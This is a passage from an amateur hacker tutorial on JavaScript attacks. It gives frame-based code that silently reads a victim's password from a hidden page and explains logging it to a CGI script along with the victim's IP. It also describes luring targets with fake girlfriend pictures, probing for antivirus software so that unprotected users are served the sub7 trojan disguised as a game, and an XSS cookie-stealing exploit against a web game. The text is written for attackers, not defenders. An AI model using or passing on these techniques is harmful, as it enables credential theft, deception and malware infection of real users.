window.vulnscript.document.close();
}
//-->
</script>
</html>
--------
end --------
of
course in real use the size of the cols would be set so frame #2 (vulnscript)
would be 0%.. So that the user wouldn't even know what is happening.
Now
this is what the fuckca.html is:
--------
begin --------
<html><body>
<script
type="text/javascript">
<!—
var
name1 = parent.vulnscript.document.forms[0].pass1.value;
parent.blah.document.write(name1);
//-->
</script>
</body></html>
--------
end --------
all
this does is print out the value of the first (unnamed) form from the frame
named vulnscript (the one that has the page where we want to steal data from).
This is what their userconfig.pl displayed that we were grabbing:
Password : <INPUT TYPE="password" SIZE=45 NAME="pass1"
MAXLENGTH=16
value="testpass">
The
problem is that it would display the password in plain text
(value="testpass" - testpass is the password) why it did this I don't
know, stupid programming I guess. But if you got a hold of someone's
cookie you could view that script and it would give you the pass.. So what this
little trick with frames and javascript does is make users visit the page without
knowing and then lets our javascript grab their password. Instead of
printing the password to frame #1 (name=blah) we could have sent an invisible
frame to a script which logs input. Example:
instead of
parent.blah.document.write(name1);
have
parent.vulnscript.location.replace(log.cgi?name1);
I would then tell a few people who I want passwords from about this page, say
"hey, want to see a picture of my girlfriend?" (All hackX0r guys like
pics of girls) then I would just put up some stupid pic.. Maybe Britney
Spears or something. The log.cgi would log both name1 (their password) and
$ENV{'REMOTE_ADDR'} (their ip address). This would let me match up
usernames to passwords fairly easy. You could also get their username
from grabbing it off the page, or from the contents of the cookie.
This
attack is fairly complicated, so I didn't explain why I did a few things. I
figure anyone who could actually pull this off would understand why. Also
not many sites are vuln to this, and even the ones that are usually the
attacker does not have the ability to hop on the irc channel and trick people
into viewing it.
Ok, this is probably the least likely technique in this tutorial to be
used. All the rest can be used fairly often. This one is used to
gain enough info on someone in order to form a trojan attack on them.
What this javascript will allow us to do is to probe their system and see if
they have any security against our attack. It will let us see what
anti-virus program they use, what firewall they use, and if they have any
programs that allow us to infect them with macros.
This
was originally a bugtraq post: ( http://www.securityfocus.com/archive/1/224673
) with a link to the example at http://geocities.com/dzzie/sys_snoop1.html
but we are going to probe for more
security related programs. (put a probe for anti-virus programs, firewalls,
word, adobe acrobat [pdf])
Lets say we check for anti-virus programs, if they don't have any you can
display a link to download sub7 and say it is a video game... if they do have
an anti-virus program you can display the link to the real game. This way
you don't have to worry about the user finding out that you tried to send them
a trojan. Only users who don't have an anti-virus program will have
downloaded the trojan.
One
possible future for trojan's is modules that you can insert to attack specific
programs. For instance if you know the user is running a certain type of
anti-virus program and they are running a certain type of firewall you can plug
those modules into the trojan. When the user downloads and runs this
trojan the modules will trojan those anti-virus and firewall making them seem
as if they are running fine, when they aren't. Ether they won't detect
your trojan or they will replace them with a emtpy program that just puts the
icons in the taskbar and task list. I will try to get a working deminstration
of how javascript can be used to download the correct trojan for a user's
system or detect if the trojan will be detected by an anti-virus program so it
will make them download a regular file.
If
you have a firewall or anti-virus program please send me the full address
(absolute address) to all the images it has. email the list to oyya@live.com
What the javascript will do is try and load that image, if it does then ie will
return a true value, if it doesn't ie will return false and we will know the user
does not have that software installed. When I get enough info on the main
anti-virus and main firewalls I will put together the code and explain it
better.
This section isn't really done, but I am getting sick of writing so I guess
I'll have to finish it later. All I am going to do is add a demo of how
to check for anti-virus programs.
8. Stories Of Javascript Hacks
I have decided to add a section here of a few interesting javascript hacks I
have heard about and seen. Since normal web site defacments and such are
full of script kiddies who just ./own site.com with no creativity or thought I
like to hear a nice story of hackers coming up with cool ways to manipulate
systems and people.
First story is about a webgame called redlite (taken from a tutorial I
wrote a few weeks ago)
What happend was that a friend of mine found his first exploit and with the
help of someone else coding it - got it to work really good. Before I
continue with the story you'll need to know alittle bit about the situation.
In
#b0g on us.undernet.org, a place where I hang out sometimes there is alot of
people into this online game called redlite .
The object of the game is to fight people in an online version of a drug
war. You have crack, hoes, guns, money, and the like. Now a few
days prior to this I was about to sign up for it just to see what all the fuss
was about, as I was signing up I saw that the registration script prints what
is inputted to it. The script also didn't filter anything but ' and
" from the input, so it could be used to steal cookies from users. I
coded up the exploit and tested it... everything worked fine. But I never
found out if you can do anything with just a user's cookie. And I didn't
really care about the game, so the exploit never really got used. When I
went back into #b0g xhaze and tak, two redlite players and b0g gimps had found
another script that prints something to a page.
